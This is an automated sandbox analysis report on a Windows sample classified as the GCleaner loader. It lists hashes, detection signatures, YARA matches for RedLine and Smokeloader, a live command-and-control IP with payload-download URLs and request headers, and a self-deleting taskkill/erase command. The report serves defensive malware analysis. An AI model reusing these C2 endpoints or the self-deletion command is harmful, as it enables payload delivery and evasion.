Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1500394
MD5: e0e8e64dfad5b7dcae0d8c569c3995a2
SHA1: 307aa823e40f082fb0ff99fb6996d4f34c5abb45
SHA256: 9f860b523257827deceedaf7f95fba8e45e241602003ead07ad41727dbcd2f4c
Tags: exe
Infos:

Detection

GCleaner
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected GCleaner
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
AV process strings found (often used to terminate AV products)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
One or more processes crash
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://80.66.75.114/files/download Avira URL Cloud: Label: malware
Found malware configuration
Source: 0.3.file.exe.740000.0.raw.unpack Malware Configuration Extractor: GCleaner {"C2 addresses": ["80.66.75.114"]}
Multi AV Scanner detection for domain / URL
Source: http://80.66.75.114/files/download Virustotal: Detection: 18% Perma Link
Source: http://80.66.75.114/6.75.114/add?substr=one&s=two Virustotal: Detection: 9% Perma Link
Source: http://80.66.75.114/files/download4/files/download Virustotal: Detection: 8% Perma Link
Source: http://80.66.75.114/files/downloadData Virustotal: Detection: 15% Perma Link
Source: http://80.66.75.114/ Virustotal: Detection: 16% Perma Link
Source: http://80.66.75.114/files/downloadP Virustotal: Detection: 12% Perma Link
Source: http://80.66.75.114/files/downloadN Virustotal: Detection: 8% Perma Link
Source: http://80.66.75.114/files/downloadL Virustotal: Detection: 9% Perma Link
Source: http://80.66.75.114/add?substr=one&s=two Virustotal: Detection: 15% Perma Link
Multi AV Scanner detection for submitted file
Source: file.exe Virustotal: Detection: 30% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.9% probability
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected

Compliance
barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack
Uses 32bit PE files
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior

Networking
barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor IPs: 80.66.75.114
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 80.66.75.114 80.66.75.114
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: RISS-ASRU RISS-ASRU
Source: unknown TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004018E0 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,LdrInitializeThunk,MultiByteToWideChar,MultiByteToWideChar, 0_2_004018E0
Source: global traffic HTTP traffic detected: GET /add?substr=one&s=two HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 80.66.75.114Connection: Keep-AliveCache-Control: no-cache
Source: file.exe, 00000000.00000003.1860003838.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1783507267.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1829531312.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1738300300.0000000000898000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1806125561.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2073934684.0000000002E31000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1760828703.000000000089A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.66.75.114/
Source: file.exe, 00000000.00000003.1860003838.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1783507267.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1829531312.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1738300300.0000000000898000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1806125561.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1760828703.000000000089A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.66.75.114/6.75.114/add?substr=one&s=two
Source: file.exe, 00000000.00000003.1860003838.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1783507267.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1829531312.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1738300300.0000000000898000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1806125561.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2073485392.0000000000893000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1760828703.000000000089A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.66.75.114/add?substr=one&s=two
Source: file.exe, 00000000.00000003.1860003838.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1783507267.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1829531312.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1738300300.0000000000898000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1806125561.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1760828703.000000000089A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.66.75.114/add?substr=one&s=twoi
Source: file.exe, 00000000.00000003.1905305826.00000000008AC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.66.75.114/files/download
Source: file.exe, 00000000.00000003.1760828703.000000000089A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.66.75.114/files/download4/files/download
Source: file.exe, 00000000.00000003.1829531312.000000000089A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.66.75.114/files/download4/files/downloadP
Source: file.exe, 00000000.00000003.1860003838.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1829531312.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.000000000089A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.66.75.114/files/downloadData
Source: file.exe, 00000000.00000003.1860003838.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1783507267.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1829531312.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1738300300.0000000000898000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1806125561.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1760828703.000000000089A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.66.75.114/files/downloadL
Source: file.exe, 00000000.00000003.1860003838.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1783507267.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1829531312.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1738300300.0000000000898000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1806125561.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1760828703.000000000089A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.66.75.114/files/downloadLMEM
Source: file.exe, 00000000.00000003.1829531312.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1806125561.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1860003838.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1783507267.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.00000000008AC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.66.75.114/files/downloadN
Source: file.exe, 00000000.00000003.1860003838.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1783507267.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1738300300.0000000000898000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1806125561.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1760828703.000000000089A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.66.75.114/files/downloadP
Source: file.exe, 00000000.00000003.1860003838.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1783507267.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1829531312.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1738300300.0000000000898000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1806125561.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1760828703.000000000089A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.66.75.114/wi
Source: Amcache.hve.9.dr String found in binary or memory: http://upx.sf.net

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 00000000.00000002.2073463747.00000000007C4000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00404530 0_2_00404530
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00422900 0_2_00422900
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004132D4 0_2_004132D4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00413AB9 0_2_00413AB9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004096D0 0_2_004096D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005F9937 0_2_005F9937
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0060353B 0_2_0060353B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005F4797 0_2_005F4797
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\file.exe Code function: String function: 004088D0 appears 38 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 005F8B37 appears 37 times
One or more processes crash
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5356 -s 1504
Uses 32bit PE files
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 00000000.00000002.2073463747.00000000007C4000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.troj.evad.winEXE@7/8@0/1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007C51AE CreateToolhelp32Snapshot,Module32First, 0_2_007C51AE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004018E0 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,LdrInitializeThunk,MultiByteToWideChar,MultiByteToWideChar, 0_2_004018E0
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\add[1].htm Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5600:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5356
Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\57ec410c-7051-447b-81e9-c639cfb7f2c8 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Command line argument: `a}{ 0_2_00404530
Source: C:\Users\user\Desktop\file.exe Command line argument: P2@ 0_2_00404530
Source: C:\Users\user\Desktop\file.exe Command line argument: `a}{ 0_2_005F4797
Source: C:\Users\user\Desktop\file.exe Command line argument: ,zB 0_2_005F4797
Source: C:\Users\user\Desktop\file.exe Command line argument: dyB 0_2_005F4797
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "file.exe")
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: file.exe Virustotal: Detection: 30%
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "file.exe" /f & erase "C:\Users\user\Desktop\file.exe" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "file.exe" /f
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5356 -s 1504
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "file.exe" /f & erase "C:\Users\user\Desktop\file.exe" & exit Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "file.exe" /f Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll Jump to behavior
